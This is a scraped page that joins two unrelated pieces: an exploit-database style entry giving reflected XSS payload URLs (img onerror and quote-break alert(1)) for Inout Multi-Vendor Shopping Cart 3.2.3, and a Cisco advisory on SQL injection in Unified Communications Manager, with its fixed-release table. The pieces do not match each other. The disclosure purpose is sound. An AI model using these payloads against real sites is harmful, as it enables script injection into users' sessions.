SadsouL, His0k4, Hussin X, Mr. SQL            CryptoJob (Twitter) twitter.com/CryptozJob     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘                                    © CraCkEr 2023                                    ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /index.phpMethod: GETURL parameter 'page' is vulnerable to XSShttps://www.website.com/index.php?page=product%2fcouponsh446k%3cimg%20src%3da%20onerror%3dalert(1)%3eciqs8URL parameter 'keyword' is vulnerable to XSShttps://www.website.com/index.php?page=product/productviews&keyword=tv24708%22%3balert(1)%2f%2f279[-] Done

Inout Multi-Vendor Shopping Cart 3.2.3 Cross Site Scripting

A vulnerability in the web-based management interface of Cisco Unified Communications Manager (Unified CM) and Cisco Unified Communications Manager Session Management Edition (Unified CM SME) could allow an authenticated, remote attacker to conduct SQL injection attacks on an affected system. This vulnerability exists because the web-based management interface inadequately validates user input. An attacker could exploit this vulnerability by authenticating to the application as a low-privileged user and sending crafted SQL queries to an affected system. A successful exploit could allow the attacker to read or modify any data on the underlying database or elevate their privileges.

*   Cisco has released free software updates that address the vulnerability described in this advisory. Customers with service contracts that entitle them to regular software updates should obtain security fixes through their usual update channels.
    
    Customers may only install and expect support for software versions and feature sets for which they have purchased a license. By installing, downloading, accessing, or otherwise using such software upgrades, customers agree to follow the terms of the Cisco software license:  
    https://www.cisco.com/c/en/us/products/end-user-license-agreement.html
    
    Additionally, customers may only download software for which they have a valid license, procured from Cisco directly, or through a Cisco authorized reseller or partner. In most cases this will be a maintenance upgrade to software that was previously purchased. Free security software updates do not entitle customers to a new software license, additional software feature sets, or major revision upgrades.
    
    The Cisco Support and Downloads page on Cisco.com provides information about licensing and downloads. This page can also display customer device support coverage for customers who use the My Devices tool.
    
    When considering software upgrades, customers are advised to regularly consult the advisories for Cisco products, which are available from the Cisco Security Advisories page, to determine exposure and a complete upgrade solution.
    
    In all cases, customers should ensure that the devices to be upgraded contain sufficient memory and confirm that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, customers are advised to contact the Cisco Technical Assistance Center (TAC) or their contracted maintenance providers.
    
    **Customers Without Service Contracts**
    
    Customers who purchase directly from Cisco but do not hold a Cisco service contract and customers who make purchases through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should obtain upgrades by contacting the Cisco TAC: https://www.cisco.com/c/en/us/support/web/tsd-cisco-worldwide-contacts.html
    
    Customers should have the product serial number available and be prepared to provide the URL of this advisory as evidence of entitlement to a free upgrade.
    
    **Fixed Releases**
    
    In the following table(s), the left column lists Cisco software releases. The right column indicates whether a release is affected by the vulnerability that is described in this advisory and the first release that includes the fix for this vulnerability. Customers are advised to upgrade to an appropriate fixed software release as indicated in this section.
    
    Cisco Unified CM and Unified CM SME Release
    
    First Fixed Release
    
    11.5(1)
    
    Migrate to a fixed release.
    
    12.5(1)
    
    12.5(1)SU7
    
    14
    
    14SU3 (Mar 2023)
    
    The Cisco Product Security Incident Response Team (PSIRT) validates only the affected and fixed release information that is documented in this advisory.

Tag

#sql